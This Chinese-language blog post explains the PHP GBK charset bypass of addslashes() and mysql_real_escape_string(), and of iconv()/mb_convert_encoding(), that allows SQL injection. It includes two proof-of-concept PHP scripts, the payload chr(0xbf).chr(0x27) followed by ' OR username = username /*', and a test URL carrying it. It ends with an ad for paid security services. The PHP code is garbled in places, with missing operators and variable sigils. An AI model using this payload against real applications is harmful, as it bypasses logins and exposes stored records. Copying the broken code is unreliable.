PHP字符编码绕过漏洞总结

      其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes() 转换后

变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞就触

发了。

     mysql_real_escape_string() 也存在相同的问题,只不过相比 addslashes() 它考虑到了用什么字符集来处理,因此可以用相

应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。

方法一:

改变mysql配置文件my.cnf

CODE:

[client]
default-character-set=GBK
方法二:
在建立连接时使用
CODE:
SET CHARACTER SET 'GBK'
例:mysql_query("SET CHARACTER SET 'gbk'"$c);
问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和 addslashes() 一样的漏洞
<?php

$c 
mysql_connect("localhost""user""pass"
);
mysql_select_db("database"$c
);

// change our character set
mysql_query("SET CHARACTER SET 'gbk'"$c
);

// create demo table
mysql_query(
"CREATE TABLE users (
    username VARCHAR(32) PRIMARY KEY,
    password VARCHAR(32)
) CHARACTER SET 'GBK'"
$c
);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')"$c
);

// now the exploit code
$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*'

$_POST['password'] = 'anything'


// Proper escaping, we should be safe, right?
$user mysql_real_escape_string($_POST['username'], $c
);
$passwd mysql_real_escape_string($_POST['password'], $c
);

$sql "SELECT * FROM  users WHERE  username = '{$user}' AND password = '{$passwd}'"
;
$res mysql_query($sql$c
);
echo 
mysql_num_rows($res); 
// will print 2, indicating that we were able to fetch all records

?>

纵观以上两种触发漏洞的关键是addslashes() 在Mysql配置为GBK时就可以触发漏洞,而mysql_real_escape_string() 是在不知
道字符集的情况下用默认字符集处理产生漏洞的。
       下面再来分析下国内最近漏洞产生的原因。
问题出现在一些字符转换函数上,例如mb_convert_encoding()和iconv()等。
发布在80sec上的说明说0xc127等一些字符再被addslashes() 处理成0xc15c27后,又经过一些字符转换函数变为0×808027,而使得经过
addslashes() 加上的"\"失效,这样单引号就又发挥作用了。这就造成了字符注入漏洞。 
      根据80sec的说明,iconv()没有该问题,但经我用0xbf27测试
id1=mbconvertencoding(_GET['id'], 'utf-8', 'gbk');
id2=iconv(gbk//IGNORE,utf8,_GET['id']);
id3=iconv(gbk,utf8,_GET['id']);
这些在GPC开启的情况下还是会产生字符注入漏洞,测试代码如下:
<?php

$c 
mysql_connect("localhost""user""pass"
);
mysql_select_db("database"$c
);

// change our character set
mysql_query("SET CHARACTER SET 'gbk'"$c
);

// create demo table
mysql_query(
"CREATE TABLE users (
    username VARCHAR(32) PRIMARY KEY,
    password VARCHAR(32)
) CHARACTER SET 'GBK'"
$c
);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')"$c
);

// now the exploit code
//id1=mbconvertencoding(_GET['id'], 'utf-8', 'gbk');
id2=iconv(gbk//IGNORE,utf8,_GET['id']);
//id3=iconv(gbk,utf8,_GET['id']);

$sql "SELECT * FROM  users WHERE  username = '{$id2}' AND password = 'password'"
;
$res mysql_query($sql$c
);
echo 
mysql_num_rows($res); 
// will print 2, indicating that we were able to fetch all records

?>
测试情况 http://www.safe3.cn/test.php?id=%bf%27 OR username = username /*
 
    后记,这里不光是%bf,其它许多字符也可以造成同样漏洞,大家可以自己做个测试的查下,这里有zwell文章提到的一个分析
http://hackme.ntobjectives.com/sql_inject/login_addslashes.php 。编码的问题在xss中也有利用价值,详情请看我
       最后发下广告,保护伞网络http://www.safe3.cn/提供有偿服务器安全服务。

 
posted @   有安科技  阅读(15894)  评论(5编辑  收藏  举报
(评论功能已被禁用)
编辑推荐:
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· AI 智能体引爆开源社区「GitHub 热点速览」
· 写一个简单的SQL生成工具
点击右上角即可分享
微信分享提示